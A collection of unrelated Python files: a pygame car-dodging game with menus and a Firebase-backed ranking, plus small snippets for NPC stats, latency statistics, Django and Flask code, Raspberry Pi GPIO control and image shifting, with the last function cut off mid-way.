        botao(310,490,190,40,black,blue,acao = 'controles')
        botao(310,550,190,40,black,yellow,acao = 'quit')
        # Captions drawn separately on top of the button rectangles.
        font = pygame.font.SysFont(None, 40)
        text = font.render('PLAY',True,white)
        gameDisplay.blit(text,(366,380))
        font = pygame.font.SysFont(None, 40)
        text = font.render('RANKING',True,white)
        gameDisplay.blit(text,(336,440))
        font = pygame.font.SysFont(None, 40)
        text = font.render('CONTROLS',True,white)
        gameDisplay.blit(text,(325,500))
        font = pygame.font.SysFont(None, 40)
        text = font.render('QUIT',True,white)
        gameDisplay.blit(text,(369,560))
        pygame.display.update()
def gamb():
    """Callback for the Tk "OK" button: hands control to the pygame intro
    screen ("gambiarra"/workaround, hence the name)."""
    intro()
    #pag_inicial.root.destroy()
# NOTE(review): module-level and apparently unused.
abc = ""
def tkinter():
    """Show a small Tk window asking for the player's name.

    Stores the entry's StringVar in module-level ``nome`` (read later by
    Ranking()).  The OK button jumps into the game via gamb().
    NOTE(review): this function name shadows the stdlib ``tkinter`` module
    name -- confirm how Tk/StringVar/Label/Entry/Button are imported above.
    """
    global nome
    pag_inicial = Tk()
    pag_inicial.geometry('250x100+500+300')
    pag_inicial.title('Nome')
    nome = StringVar()
    # .pack() returns None, so these three names are always None; kept as-is.
    shin_doidao = Label(pag_inicial,text = "Insira o seu nome:").pack()
    inserir_shin_doidao = Entry(pag_inicial,textvariable = nome).pack()
    shin_chapadao = Button(pag_inicial,text = "OK", command = gamb, fg = 'black', bg = 'white').pack()
    pag_inicial.mainloop()
def restart():
    """Game-over screen asking whether to play again.

    YES -> music_select(), NO -> intro() (dispatched through botao()).
    """
    restart = True
    while restart:
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                pygame.quit()
                quit()
        DisplayDoJogo.blit(fundointro, (0,0))
        mensagem('Play again?',red,80,0,'medium')
        #mensagem(Jogador.Score,green,0,0,'medium')
        botao(355,440,80,40,black,green,acao='sim')
        botao(355,515,80,40,black,red,acao='nao')
        font = pygame.font.SysFont(None, 40)
        text = font.render('YES',True,white)
        gameDisplay.blit(text,(370,450))
        font = pygame.font.SysFont(None, 40)
        text = font.render('NO',True,white)
        gameDisplay.blit(text,(375,525))
        # Silence the game-over jingle once this screen is up.
        pygame.mixer.Sound.stop(faustao)
        pygame.display.update()
def rank():
    """Ranking screen: draws the top-10 list built by ordena_ranking()."""
    rank = True
    while rank:
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                pygame.quit()
                quit()
        gameDisplay.blit(deserto,(0,0))
        # Title drawn twice with a small offset for a drop-shadow effect.
        mensagem("RANKING",black,-265,0,'medium')
        mensagem("RANKING",red,-268,3,'medium')
        botao(690,550,100,40,black,yellow,acao='back')
        font = pygame.font.SysFont(None, 40)
        text = font.render('BACK',True,white)
        gameDisplay.blit(text,(700,560))
        texto = ordena_ranking(produto).split("\n")
        ct = 0
        for linha in texto:
            # One shadowed line per ranking entry, 50px apart.
            mensagem(linha,black,-220 + ct*50,0,'small')
            mensagem(linha,yellow,-223 + ct*50,3,'small')
            ct +=1
        pygame.display.update()
def controle():
    """Controls/help screen: shoot with space, steer with the arrow keys."""
    controle = True
    while controle:
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                pygame.quit()
                quit()
        DisplayDoJogo.fill(white)
        mensagem('Controls',red,-250,0,'medium')
        mensagem('Press the space button to shoot',blue,-60,0,'small')
        mensagem('Use the directionals to control the car',blue,190,0,'small')
        botao(690,550,100,40,black,yellow,acao='back')
        font = pygame.font.SysFont(None, 40)
        text = font.render('BACK',True,white)
        gameDisplay.blit(text,(700,560))
        # Illustration sprites for the space bar and the arrow keys.
        gameDisplay.blit(space,(225,150))
        gameDisplay.blit(arrow,(280,300))
        pygame.display.update()
def rostos():
    """Tutorial screen: shows which faces give points, which to dodge, and
    the ammo box; PLAY continues to the music-selection screen."""
    rostos = True
    while rostos:
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                pygame.quit()
                quit()
        DisplayDoJogo.fill(grey)
        mensagem('Take these faces to get points',green,-150,90,'small')
        mensagem('Take this block to get ammo',yellow,220,90,'small')
        mensagem('Bypass these faces',red,60,90,'small')
        botao(690,550,100,40,black,green,acao='playy')
        font = pygame.font.SysFont(None, 40)
        text = font.render('PLAY',True,white)
        gameDisplay.blit(text,(705,560))
        # Bonus faces (top), ammo box, and obstacle faces (bottom cluster).
        gameDisplay.blit(haddad,(80,40))
        gameDisplay.blit(vinicius,(100,160))
        gameDisplay.blit(cubo,(100,490))
        gameDisplay.blit(helopeq,(80,300))
        gameDisplay.blit(mirpeq,(80,380))
        gameDisplay.blit(lorpeq,(150,300))
        gameDisplay.blit(fredpeq,(150,380))
        gameDisplay.blit(orfpeq,(210,340))
        pygame.display.update()
#def Score_Final():
#Score_Final = True
#while Score_Final:
#for event in pygame.event.get():
#if event.type == pygame.QUIT:
#pygame.quit()
#quit()
#DisplayDoJogo.blit(scorefinal,(0,0))
#botao(690,550,100,40,black,green,acao='forward')
#font = pygame.font.SysFont(None, 40)
#text = font.render('PLAY',True,white)
#gameDisplay.blit(text,(705,560))
#font = pygame.font.SysFont(None, 40)
#text = font.render(Jogador.Score,True,black)
#gameDisplay.blit(text,(200,200))
#pygame.display.update()
#font = pygame.font.SysFont(None, 40)
#text = font.render("Pinto",True,green)
#DisplayDoJogo.blit(text,(200,200))
#def bater(Jogador):
#print(Jogador.Score)
#pygame.mixer.Sound.stop(som)
#pygame.mixer.Sound.set_volume(faustao,1.0)
#pygame.mixer.Sound.play(faustao)
#mensagem('ERROOOOU!!!',red,0,0,'large')
#pygame.display.update()
#Ranking(Jogador.Score)
#print(produto)
#time.sleep(2)
#loop_jogo()
#Score_Final()
#restart()
class car_botao():
    """Clickable car-selection button.

    The class attribute ``carro`` records the most recently chosen car and
    is read by loop_jogo().  NOTE(review): the ``acao`` argument is stored
    but never used -- selection is dispatched on hard-coded (x, y) positions
    that must match the four instances created below.
    """
    carro = 'mini'
    def __init__(self,img,img2,x,y,w,h,acao=None):
        # img: normal sprite; img2: hover sprite; (x, y, w, h): hit box.
        self.img = img
        self.img2 = img2
        self.x = x
        self.y = y
        self.w = w
        self.h = h
        self.acao = acao
    def show_car(self):
        """Draw the button (hover swaps sprites); on click record the car
        matching this button's position and start the game."""
        mouse = pygame.mouse.get_pos()
        click = pygame.mouse.get_pressed()
        if self.x + self.w > mouse[0] > self.x and self.y + self.h > mouse[1] > self.y:
            gameDisplay.blit(self.img2,(self.x,self.y))
            if click[0] == 1:
                # Positions correspond to Ferrari / Mini / Delorean / Speed.
                if self.x == 58 and self.y == 140:
                    car_botao.carro = 'ferrari'
                    loop_jogo()
                if self.x == 442 and self.y == 140:
                    car_botao.carro = 'mini'
                    loop_jogo()
                if self.x == 58 and self.y == 360:
                    car_botao.carro = 'delorean'
                    loop_jogo()
                if self.x == 442 and self.y == 360:
                    car_botao.carro = 'speed'
                    loop_jogo()
        else:
            gameDisplay.blit(self.img,(self.x,self.y))
def car_select():
    """Car-selection screen; each car_botao dispatches into loop_jogo()."""
    # Debounce the click that navigated to this screen.
    time.sleep(0.3)
    sel = True
    while sel:
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                pygame.quit()
                quit()
        gameDisplay.fill(grey)
        Mini_object.show_car()
        Ferrari_object.show_car()
        Delorean_object.show_car()
        Speed_object.show_car()
        mensagem('Choose your car',red,-250,0,'medium')
        pygame.display.update()
# Button positions must match the hard-coded (x, y) checks in show_car().
Mini_object = car_botao(Mini,Mini2,442,140,300,188)
Ferrari_object = car_botao(Ferrari,Ferrari2,58,140,300,188)
Delorean_object = car_botao(Delorean2,Delorean,58,360,300,188)
Speed_object = car_botao(Speed2,Speed,442,360,300,188)
class music_botao():
    """Clickable artist/soundtrack button for the music-selection screen.

    The class attribute ``musica`` records the chosen artist and is read by
    loop_jogo().  NOTE(review): like car_botao, ``acao`` is stored but never
    used -- dispatch is on hard-coded (x, y) positions matching the six
    instances created below.
    """
    musica = 'uptown'
    def __init__(self,img,img2,x,y,w,h,acao=None):
        # img: normal sprite; img2: hover sprite; (x, y, w, h): hit box.
        self.img = img
        self.img2 = img2
        self.x = x
        self.y = y
        self.w = w
        self.h = h
        self.acao = acao
    def show_music(self):
        """Draw the button (hover swaps sprites); on click record the artist
        and move on to car selection."""
        mouse = pygame.mouse.get_pos()
        click = pygame.mouse.get_pressed()
        if self.x + self.w > mouse[0] > self.x and self.y + self.h > mouse[1] > self.y:
            gameDisplay.blit(self.img2,(self.x,self.y))
            if click[0] == 1:
                if self.x == 65 and self.y == 80:
                    music_botao.musica = 'bruno'
                    car_select()
                if self.x == 555 and self.y == 80:
                    music_botao.musica = 'calvin'
                    car_select()
                if self.x == 310 and self.y == 80:
                    music_botao.musica = 'brinquedo'
                    car_select()
                if self.x == 65 and self.y == 340:
                    music_botao.musica = 'garrix'
                    car_select()
                if self.x == 310 and self.y == 340:
                    music_botao.musica = 'katy'
                    car_select()
                if self.x == 555 and self.y == 340:
                    music_botao.musica = 'acdc'
                    car_select()
        else:
            gameDisplay.blit(self.img,(self.x,self.y))
def music_select():
    """Soundtrack-selection screen; each music_botao leads to car_select()."""
    # Debounce the click that navigated to this screen.
    time.sleep(0.3)
    mus = True
    while mus:
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                pygame.quit()
                quit()
        gameDisplay.fill(grey)
        calvin_object.show_music()
        bruno_object.show_music()
        brinquedo_object.show_music()
        garrix_object.show_music()
        katy_object.show_music()
        acdc_object.show_music()
        mensagem('Choose the artist',red,-270,0,'medium')
        pygame.display.update()
# Button positions must match the hard-coded (x, y) checks in show_music().
calvin_object = music_botao(calvin2,calvin,555,80,180,244)
bruno_object = music_botao(bruno2,bruno,65,80,180,244)
brinquedo_object = music_botao(brinquedo2,brinquedo,310,80,180,244)
garrix_object = music_botao(garrix2,garrix,65,340,180,244)
katy_object = music_botao(katy2,katy,310,340,180,244)
acdc_object = music_botao(acdc2,acdc,555,340,180,244)
def Ranking(Score):
    """Append a {player_name: Score} entry to the global ranking list.

    Reads the Tk StringVar ``nome`` filled in by tkinter(); appends to the
    module-level ``produto`` list (persisted to Firebase elsewhere).
    """
    global nometext
    nometext = nome.get()
    ranking = {}
    ranking[nometext] = Score
    produto.append(ranking)
# Replace this URL with the one for your own Firebase app
FIREBASE_URL = "https://car-game.firebaseio.com/"
# Main
if __name__ == '__main__':
    fb = firebase.FirebaseApplication(FIREBASE_URL, None)
    # Write the accumulated scores to Firebase
    fb.put('/', "Scores", produto)
def ordena(dici):
    """Sort key for ranking entries.

    Each entry is a single-item {name: score} dict, or a None placeholder
    coming back from Firebase.  Returns the score, 0 for None entries, and
    (matching the original) None for an unexpected empty dict.
    """
    if dici is None:  # identity check -- `== None` is unidiomatic
        return 0
    for valor in dici.values():
        return valor
def ordena_ranking(produto):
    """Format the top-10 scores as "name : score" lines.

    *produto* is a list of single-entry {name: score} dicts (None entries
    are skipped).  Entries are ordered best-first using ordena() as the key.
    The result is printed (legacy debugging, kept) and returned as a string
    with one trailing newline per entry.
    """
    ordem = list(reversed(sorted(produto, key=ordena)))[:10]
    partes = []
    for cada in ordem:
        if cada is None:  # `is None`, not `== None`; Firebase placeholder rows
            continue
        for nome_jogador, pontos in cada.items():
            # Collect pieces and join once -- avoids quadratic `+=` growth.
            partes.append(str(nome_jogador) + " : " + str(pontos) + "\n")
    ranking = "".join(partes)
    print(ranking)
    return ranking
#gameDisplay.fill(black)
# Thin blit wrappers: each draws one sprite at the given position.
def fundo(x,y):
    # NOTE(review): shadows the 'fundo' image loaded at the top of the file.
    DisplayDoJogo.blit(Imagem_Fundo,(x,y))
def imagem_carro(a,b):
    # imgcarro is the global set by loop_jogo() from the selected car.
    DisplayDoJogo.blit(imgcarro,(a,b))
def lourenco1(r,s):
    DisplayDoJogo.blit(lourenco,(r,s))
def miranda1(r,s):
    DisplayDoJogo.blit(miranda,(r,s))
def orfali1(r,s):
    DisplayDoJogo.blit(orfali,(r,s))
def fred1(r,s):
    # NOTE(review): 'fred5' is defined outside this chunk -- confirm.
    DisplayDoJogo.blit(fred5,(r,s))
def haddad1(r,s):
    DisplayDoJogo.blit(haddad,(r,s))
def vinicius1(r,s):
    DisplayDoJogo.blit(vinicius,(r,s))
def heloisa1(r,s):
    DisplayDoJogo.blit(heloisa,(r,s))
# Main game window.  NOTE(review): 'gameDisplay', used interchangeably
# throughout the file, is presumably the same surface created earlier --
# TODO confirm.
DisplayDoJogo = pygame.display.set_mode((largura_da_tela,altura_da_tela))
# Game-loop exit flag ("do not run game").
Não_Rodar_Jogo = False
def loop_jogo():
    """Main gameplay loop: scrolling road, obstacle/bonus faces, ammo boxes
    and shooting.

    Reads the menu selections from car_botao.carro and music_botao.musica,
    then runs the frame loop until the window is closed or the player
    crashes (which leads to Score_Final()/restart() via bater()).
    """
    #Imagem_Fundo = pygame.image.load('8bitsRoad.png')
    #Imagem_Fundo = pygame.transform.scale(Imagem_Fundo,(largura_da_tela,1200))
    def fundo(x,y):
        # Local copy of the module-level background blitter.
        DisplayDoJogo.blit(Imagem_Fundo,(x,y))
    global imgcarro
    global som
    # Map the menu selections onto the car sprite and soundtrack to use.
    if car_botao.carro == 'ferrari':
        imgcarro = img_ferrari
    elif car_botao.carro == 'mini':
        imgcarro = img_mini
    elif car_botao.carro == 'delorean':
        imgcarro = img_delorean
    elif car_botao.carro == 'speed':
        imgcarro = img_speed
    if music_botao.musica == 'bruno':
        som = uptown
    elif music_botao.musica == 'calvin':
        som = bottle
    elif music_botao.musica == 'brinquedo':
        som = brinq
    elif music_botao.musica == 'garrix':
        som = virus
    elif music_botao.musica == 'katy':
        som = firework
    elif music_botao.musica == 'acdc':
        som = thunder
    pygame.mixer.Sound.play(som)
    # Scrolling speed and initial layout.
    velocidade_fundo = 10
    posição_inicial_fundo_y = -600
    posição_inicial_fundo_x = 0
    # Obstacle sprite size used by the collision tests below.
    prof_largura = 60
    prof_altura = 60
    car_positionY = 475
    car_positionX = 375 #left = 210, middle = 375, right = 540 - 165 apart
    # Car sprite size.
    carX = 57
    carY = 106
    # Ammo box: lane and vertical position.
    cubosx = choice([210,375,540])
    cubosy = 0
    cubos_speed = velocidade_fundo
    cubos_compr=60
    cubos_larg=66
    # Remaining shots.
    contador = 0
    lista_tiros = []
    # Speed-up stages keyed by score (currently disabled -- see the
    # commented block near the bottom of the frame loop).
    etapas = {}
    etapas[5] = [1,False]
    #etapas[10] = [1,False]
    class Jogador:
        # Shared score for this run.
        Score = 0
    class personagens:
        """A face sprite scrolling down the road (obstacle or bonus)."""
        todos = []
        def __init__(self,titulo1,titulo2):
            # titulo1/titulo2 become the x/y position once posiniper() runs.
            self.titulo1 = titulo1
            self.titulo2 = titulo2
            personagens.todos.append(self)
        def posiniper(self,random1,random2):
            """Place the sprite in a random lane, somewhere above the screen
            (random1/random2 bound the negative y range)."""
            self.titulo1 = random.choice([210,375,540])
            self.titulo2 = random.randrange(random1,random2)
            #for p in personagens.todos:
                #if self != p:
                    #if p.titulo2 < self.titulo2 + prof_altura and p.titulo2 + prof_altura >= self.titulo2:
                        #if p.titulo1 > self.titulo1 and p.titulo1 < self.titulo1 + prof_largura or p.titulo1 + prof_largura > self.titulo1 and p.titulo1 + prof_largura < self.titulo1 + prof_largura:
                            #self.titulo2 += 1000
            # if overlapping another sprite, re-draw this one's position
        def posper2(self,random3,random4):
            """Respawn above the screen after scrolling past the bottom;
            successfully passing a sprite scores one point."""
            if self.titulo2 > altura_da_tela:
                self.titulo2 = 0 - random.randrange(random3,random4)
                self.titulo1 = random.choice([210,375,540])
                Jogador.Score += 1
        def crash(self):
            """Obstacle collision with the car: ends the run via bater()."""
            if car_positionY < self.titulo2 + prof_altura and car_positionY + carY >= self.titulo2 + 50: #This and the next if cover every collision case with the block; they are geometric range tests
                if car_positionX > self.titulo1 and car_positionX < self.titulo1 + prof_largura or car_positionX + carX > self.titulo1 and car_positionX + carX < self.titulo1 + prof_largura:
                    bater(Jogador)
        def crash2 (self,value):
            """Bonus collision: add *value* points and respawn far above."""
            if car_positionY < self.titulo2 + prof_altura and car_positionY + carY >= self.titulo2 + 20: #Same geometric range tests as crash()
                if car_positionX > self.titulo1 and car_positionX < self.titulo1 + prof_largura or car_positionX + carX > self.titulo1 and car_positionX + carX < self.titulo1 + prof_largura:
                    Jogador.Score += value
                    self.titulo2 = -1500
                    self.titulo1 = random.choice([210,375,540])
    class tiros:
        """A projectile fired by the player; moves up the screen."""
        altura = 40
        largura = 10
        def __init__(self,imagem, display, posX,posY, vX = 0, vY = 0):
            self.imagem = imagem
            self.posX = posX
            self.posY = posY
            self.vX = vX
            self.vY = vY
            self.display = display
        def desenhar(self):
            self.display.blit(self.imagem, (self.posX, self.posY))
        def atualizar(self):
            # vY is subtracted: a positive vY moves the shot upwards.
            self.posX += self.vX
            self.posY -= self.vY
        def add_obstaculos(self, obst):
            self.obstaculos = obst
        def add_lista(self, lista_tiros):
            self.lista_tiros = lista_tiros
        def crash3(self):
            """Hit-test against every obstacle; a hit respawns the obstacle,
            removes this shot and scores 3 points.

            NOTE(review): removes from lista_tiros while the caller is
            iterating that same list -- shots after the removed one are
            skipped for a frame; confirm this is acceptable.
            """
            for p in obstaculos:
                if self.posY < p.titulo2 + prof_altura and self.posY + tiros.altura >= p.titulo2: #Same geometric range tests as personagens.crash()
                    if self.posX > p.titulo1 and self.posX < p.titulo1 + prof_largura or self.posX + tiros.largura > p.titulo1 and self.posX + tiros.largura < p.titulo1 + prof_largura:
                        p.titulo2 = -1500
                        p.titulo1 = random.choice([210,375,540])
                        lista_tiros.remove(self)
                        Jogador.Score += 3
    def Score_Final():
        """Post-crash screen showing the final score (SKIP -> restart())."""
        Score_Final = True
        while Score_Final:
            for event in pygame.event.get():
                if event.type == pygame.QUIT:
                    pygame.quit()
                    quit()
            pygame.mixer.Sound.stop(faustao)
            DisplayDoJogo.blit(scorefinal,(0,0))
            botao(690,550,100,40,black,green,acao='forward')
            font = pygame.font.SysFont(None, 40)
            text = font.render('SKIP',True,white)
            gameDisplay.blit(text,(705,560))
            font = pygame.font.SysFont(None, 60)
            text = font.render("Score: " + str(Jogador.Score),True,black)
            gameDisplay.blit(text,(330,200))
            #font = pygame.font.SysFont(None, 40)
            #text = font.render(str(Jogador.Score),True,black)
            #gameDisplay.blit(text,(387,250))
            pygame.display.update()
    #font = pygame.font.SysFont(None, 40)
    #text = font.render("Pinto",True,green)
    #DisplayDoJogo.blit(text,(200,200))
    def bater(Jogador):
        """Handle a crash: play the game-over jingle, record the score in
        the ranking, then show Score_Final()/restart() (never returns to
        the frame loop normally)."""
        print(Jogador.Score)
        pygame.mixer.Sound.stop(som)
        pygame.mixer.Sound.set_volume(faustao,1.0)
        pygame.mixer.Sound.play(faustao)
        mensagem('ERROOOOU!!!',red,0,0,'large')
        pygame.display.update()
        Ranking(Jogador.Score)
        #print(produto)
        time.sleep(1)
        #loop_jogo()
        Score_Final()
        restart()
    # Seven face sprites: had/vin are bonuses, the rest are obstacles.
    lor = personagens('posição_lourençoX','posição_lourençoY')
    mir = personagens('posição_mirandaX','posição_mirandaY')
    orf = personagens('posição_orfaliX','posição_orfaliY')
    fred = personagens('posição_fredX','posição_fredY')
    had = personagens('posição_haddadX','posição_haddadY')
    vin = personagens('posição_viniciusX','posição_viniciusY')
    hel = personagens('posição_heloisaX','posição_heloisaY')
    obstaculos = [lor, mir, orf, fred, hel]
    # Scatter everything above the screen; bonuses spawn much farther away.
    lor.posiniper(-2000,0)
    mir.posiniper(-3000,0)
    orf.posiniper(-2000,0)
    fred.posiniper(-2500,0)
    had.posiniper(-10000,0)
    vin.posiniper(-5000,0)
    hel.posiniper(-2500,0)
    print(velocidade_fundo)
    # Local flag: shadows the module-level Não_Rodar_Jogo of the same name.
    Não_Rodar_Jogo = False
    while not Não_Rodar_Jogo:
        for tecla in pygame.event.get():
            if tecla.type == pygame.QUIT:
                Não_Rodar_Jogo = True
            if tecla.type == pygame.KEYDOWN:
                # Lane-based steering between x = 210 / 375 / 540.
                if car_positionX == 375 and tecla.key == pygame.K_LEFT:
                    car_positionX = 210
                elif car_positionX == 210 and tecla.key == pygame.K_RIGHT:
                    car_positionX = 375
                elif car_positionX == 375 and tecla.key == pygame.K_RIGHT:
                    car_positionX = 540
                elif car_positionX == 540 and tecla.key == pygame.K_LEFT:
                    car_positionX = 375
                if tecla.key == pygame.K_SPACE:
                    # Fire only while ammo remains.
                    if contador > 0:
                        t = tiros(bala, DisplayDoJogo, car_positionX, car_positionY, 0, 10)
                        t.add_obstaculos(obstaculos)
                        lista_tiros.append(t)
                        t.add_lista(lista_tiros)
                        contador -= 1
        # Draw the frame: road, HUD, sprites, car.
        fundo(posição_inicial_fundo_x,posição_inicial_fundo_y)
        cubos_contador(contador)
        func_cubos(cubosx, cubosy)
        lourenco1(lor.titulo1,lor.titulo2)
        miranda1(mir.titulo1,mir.titulo2)
        orfali1(orf.titulo1,orf.titulo2)
        fred1(fred.titulo1,fred.titulo2)
        haddad1(had.titulo1,had.titulo2)
        vinicius1(vin.titulo1,vin.titulo2)
        heloisa1(hel.titulo1,hel.titulo2)
        # Respawn anything that scrolled off the bottom.
        lor.posper2(1000,5000)
        mir.posper2(1000,5000)
        orf.posper2(1000,5000)
        fred.posper2(1000,5000)
        had.posper2(10000,20000)
        vin.posper2(10000,20000)
        hel.posper2(1000,5000)
        imagem_carro(car_positionX,car_positionY)
        # Collision checks: obstacles end the run, bonuses score 10/20.
        lor.crash()
        mir.crash()
        orf.crash()
        fred.crash()
        hel.crash()
        vin.crash2(10)
        had.crash2(20)
        desvio(Jogador.Score)
        # Scroll everything down by the background speed.
        posição_inicial_fundo_y += velocidade_fundo
        cubosy += cubos_speed
        lor.titulo2 += velocidade_fundo
        mir.titulo2 += velocidade_fundo
        orf.titulo2 += velocidade_fundo
        fred.titulo2 += velocidade_fundo
        had.titulo2 += velocidade_fundo
        vin.titulo2 += velocidade_fundo
        hel.titulo2 += velocidade_fundo
        # Leaving the road (or the screen) counts as a crash.
        if car_positionX > 637 - carX or car_positionX < 157:
            bater(Jogador)
        if car_positionY > altura_da_tela - carY or car_positionY < 0:
            bater(Jogador)
        # Loop the background once a full tile has scrolled by.
        if posição_inicial_fundo_y == 0:
            posição_inicial_fundo_y = -600
        # Ammo box pickup (gain a shot) or recycle when it leaves the screen.
        if car_positionY < cubosy + cubos_compr:
            if car_positionX > cubosx and car_positionX < cubosx + cubos_larg or car_positionX+carX > cubosx and car_positionX + carX < cubosx + cubos_larg:
                cubosy = (altura_da_tela-3000)
                cubosx = choice([230,360,540])
                contador+=1
        else:
            if cubosy > 800:
                cubosy = (altura_da_tela-3000)
                cubosx = choice([230,360,540])
        for t in lista_tiros:
            t.atualizar()
            t.desenhar()
            t.crash3()
        #if Jogador.Score in etapas:
            #if etapas[Jogador.Score][1] == False:
                #velocidade_fundo += etapas[Jogador.Score][0]
                #etapas[Jogador.Score][1] = True
                #print('Score: %d Velocidade: %d '%(Jogador.Score, velocidade_fundo))
        #pygame.mixer.Sound.stop(faustao)
        pygame.display.update()
        framespersecond.tick(fps)
# Entry point: ask for the player's name.  Tk's mainloop blocks here; the
# OK button jumps into intro() via gamb().
tkinter()
# NOTE(review): the calls below only run once the Tk window is closed, and
# each screen above loops forever on its own; Score_Final here also names a
# function local to loop_jogo() (NameError at module level).  This tail
# looks like leftover debugging -- confirm before relying on it.
intro()
controle()
rostos()
music_select()
car_select()
Score_Final()
restart()
loop_jogo()
pygame.quit()
quit()
|
class NPC:
    """Simple data holder for a non-player character's stats."""

    def __init__(self, n_name, n_job, n_body, n_mind, n_charm):
        """Store the NPC's name, job, and its body/mind/charm stat values."""
        self.n_name = n_name
        self.n_job = n_job
        self.n_body = n_body
        self.n_mind = n_mind
        self.n_charm = n_charm

    def __repr__(self):
        # Debug-friendly representation; added (backward-compatible).
        return "NPC(%r, %r, %r, %r, %r)" % (
            self.n_name, self.n_job, self.n_body, self.n_mind, self.n_charm)
|
import numpy as np
class LantecyCalc( object ):
    """Latency statistics computed from a file with one raw period per line.

    Each line holds a number that is divided by 1000.0 -- a unit conversion
    (presumably us -> ms; confirm against the file's producer).

    Attributes:
        periods: np.ndarray of the converted periods.
        mean, std_deviation, max: summary statistics of ``periods``.
        size: number of samples.
        outliers: count of samples more than 3 standard deviations from
            the mean (either side).
    """
    def __init__(self, file_name ):
        # Collect samples in a Python list and convert once: np.append per
        # line is O(n^2).  The context manager also closes the file, which
        # the original leaked.
        with open( file_name, 'r' ) as f:
            valores = [float(line) / 1000.0 for line in f]
        self.periods = np.array( valores )
        self.size = len( self.periods )
        if self.size:
            self.mean = self.periods.mean()
            self.std_deviation = self.periods.std()
            self.max = self.periods.max()
        else:
            # Defensive defaults for an empty file (the original emitted
            # NaN warnings here).
            self.mean = 0.0
            self.std_deviation = 0.0
            self.max = 0.0
        # Outliers: samples beyond +/- 3 sigma of the mean.
        self.outliers = ( ( self.periods > (self.mean + 3*self.std_deviation) ) | ( self.periods < (self.mean - 3*self.std_deviation) ) ).sum()
# -*- coding: utf-8 -*-
"""
Introductory Python examples: printing, built-in types and arithmetic.

@author: Pramod Duvvuri
"""
print('Hello World!')
# Types in Python
print(type(3.14))
print(type(None))
# Arithmetic Operations in Python
print(6 + 12 - 3)
print(2 * 3.0)
print(- - 4)
print(10/3)
print(10.0/3.0)
a = 3
print(a + 2.0)
a = a + 1.0
# NOTE(review): a bare expression only echoes its value in a REPL; run as a
# script this line is a no-op.
a
print('Rounded Integer ', round(2.6))
print(int(2.6))
# str1 = 'hello'
# str2 = ','
# str3 = 'world'
import glob
# def load():
# Gather every image under the */vehicles directories; paths containing
# 'non' are negative (non-vehicle) samples, the rest are vehicle samples.
images = glob.glob('*vehicles/*/*')
notcars = [caminho for caminho in images if 'non' in caminho]
cars = [caminho for caminho in images if 'non' not in caminho]
## Uncomment if you need to reduce the sample size
#sample_size = 500
#cars = cars[0:sample_size]
#notcars = notcars[0:sample_size]
print('found cars:', len(cars))
print('found non-cars:', len(notcars))
# return cars, notcars
from django import template
from provider import scope
register = template.Library()
@register.filter
def scopes(scope_int):
    """
    Wrapper around :attr:`provider.scope.names` to turn an int into a list
    of scope names in templates.

    :param scope_int: integer scope bitmask as stored by the provider app.
    :return: list of scope names (via :func:`provider.scope.to_names`).
    """
    return scope.to_names(scope_int)
|
import RPi.GPIO as GPIO
import time
from math import *
from random import *
# Toggle the device on GPIO board pin 23 from console input:
# 1 switches it on, 0 switches it off, anything else exits.
off = True
while True:
    try:
        level = int(input("Input: "))
    except ValueError:
        # Non-numeric input: exit cleanly instead of crashing with a
        # traceback (the original let ValueError propagate).
        break
    if level > 1 or level < 0:
        break
    if level == 1 and off:
        off = False
        GPIO.setmode(GPIO.BOARD)
        GPIO.setup(23, GPIO.OUT)
        # Driving the pin LOW here -- assumes active-low wiring; TODO confirm.
        GPIO.output(23, 0)
    elif level == 0 and not off:
        off = True
        GPIO.cleanup()
# Only clean up if the pin is still configured.  The original called
# cleanup() unconditionally, which triggers a RuntimeWarning when no
# channels are set up (e.g. right after a 0 already cleaned up).
if not off:
    GPIO.cleanup()
|
from flask import url_for
def test_view_template_version(
    client_request,
    api_user_active,
    mock_login,
    mock_get_service,
    mock_get_template_version,
    mock_get_user,
    mock_get_user_by_email,
    mock_has_permissions,
    fake_uuid,
):
    """A single template-version page shows the author name, the template
    content and a link to the full version history."""
    service_id = fake_uuid
    template_id = fake_uuid
    version = 1
    all_versions_link = url_for("main.view_template_versions", service_id=service_id, template_id=template_id)
    page = client_request.get(
        ".view_template_version",
        service_id=service_id,
        template_id=template_id,
        version=version,
    )
    # The mock returns the same payload the view rendered.
    template = mock_get_template_version(service_id, template_id, version)
    assert api_user_active["name"] in page.text
    assert template["data"]["content"] in page.text
    assert all_versions_link in str(page)
    mock_get_template_version.assert_called_with(service_id, template_id, version)
def test_view_template_versions(
    client_request,
    api_user_active,
    mock_login,
    mock_get_service,
    mock_get_template_versions,
    mock_get_service_template,
    mock_get_user,
    mock_get_user_by_email,
    mock_has_permissions,
    fake_uuid,
):
    """The version-history page lists the template versions with the
    author name and each version's content."""
    service_id = fake_uuid
    template_id = fake_uuid
    page = client_request.get(
        ".view_template_versions",
        service_id=service_id,
        template_id=template_id,
    )
    # The mock returns the same payload the view rendered.
    versions = mock_get_template_versions(service_id, template_id)
    assert api_user_active["name"] in page.text
    assert versions["data"][0]["content"] in page.text
    mock_get_template_versions.assert_called_with(service_id, template_id)
|
from pylab import *
from mats.eq_conv_mat import eq_conv_mat
from mats.conv_mat import conv_mat
def frac_shift_2(img, v):
    """Shift a 2-D image by the fractional offsets v, with 0 <= v < 1 per
    component, using a separable linear-interpolation convolution.

    Built on the project's eq_conv_mat; returns an array of img's shape.
    """
    assert(((v>=0) & (v<1)).all())
    # 1-D interpolation kernels per axis: weight (1-v) on the centre tap
    # and v on the neighbour.
    c0 = array([0, 1-v[0], v[0]])
    c1 = array([0, 1-v[1], v[1]])
    # Separable 2-D kernel as the outer product of the two 1-D kernels.
    W = c0.reshape(1,-1)*c1.reshape(-1,1)
    sh_img = shape(img)
    # 3x3 equal-weight convolution operator with unit stride and padding;
    # its single kernel is replaced by the interpolation weights.
    c = eq_conv_mat([sh_img[0], sh_img[1]],
                    [3,3],
                    [1,1],
                    [1,1])
    c.w[0]=W
    ans=(c*img.reshape(1,-1)).reshape(shape(img))
    return ans
def gen_shift_2(img, v):
    """Shift a 2-D image by an arbitrary (possibly non-integer) offset *v*.

    Splits v into integer + fractional parts: the integer part is applied
    by clamped index remapping (edge replication), the fractional part by
    frac_shift_2().
    """
    v_int = floor(v)
    v_frac = v - floor(v)
    a,b = shape(img)
    i,j = arange(a), arange(b)
